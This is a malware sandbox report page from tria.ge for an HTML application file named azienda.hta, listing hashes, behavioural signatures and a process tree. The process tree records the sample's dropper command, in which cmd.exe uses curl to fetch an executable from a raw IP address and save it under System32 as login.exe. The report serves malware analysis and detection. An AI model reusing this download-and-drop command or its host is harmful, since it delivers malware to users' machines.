Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

1

azienda.hta

windows7-x64

3

azienda.hta

windows10-2004-x64

7

Analysis

  • max time kernel
    28s
  • max time network
    31s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    01/03/2023, 16:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    azienda.hta

  • Size

    7KB

  • MD5

    f8bb2a440466e90f9ae60c4e06ee539c

  • SHA1

    fe9e57b0245c6fb43a87ecf29bd07aea91d0b270

  • SHA256

    7590f4c3928e025b274b13e945cf2896d84b49c812ead01204f2a2303e0a59d3

  • SHA512

    82830264dd3891af4ef5cf6af8d2094f70416f5ce323e5ea96ad9d2a2b9bef99d6a4d6a84c9e59a3434c7c51f0b5d349766a5e331a861b43a21714da10bb6260

  • SSDEEP

    96:SPLY0B6XNEbJpEl0EJjAr3BZE5S4dwatxC5WLSYLw9RKUzlnoi594N0M+Q0AK/Hn:SjYC6GFpa6r/TC7QuMVnoiD00MC2Kb9

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\azienda.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c curl http://191.101.2.39/installazione.exe -o C:\Windows\\System32\\LogFiles\\login.exe
      2⤵
        PID:832

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads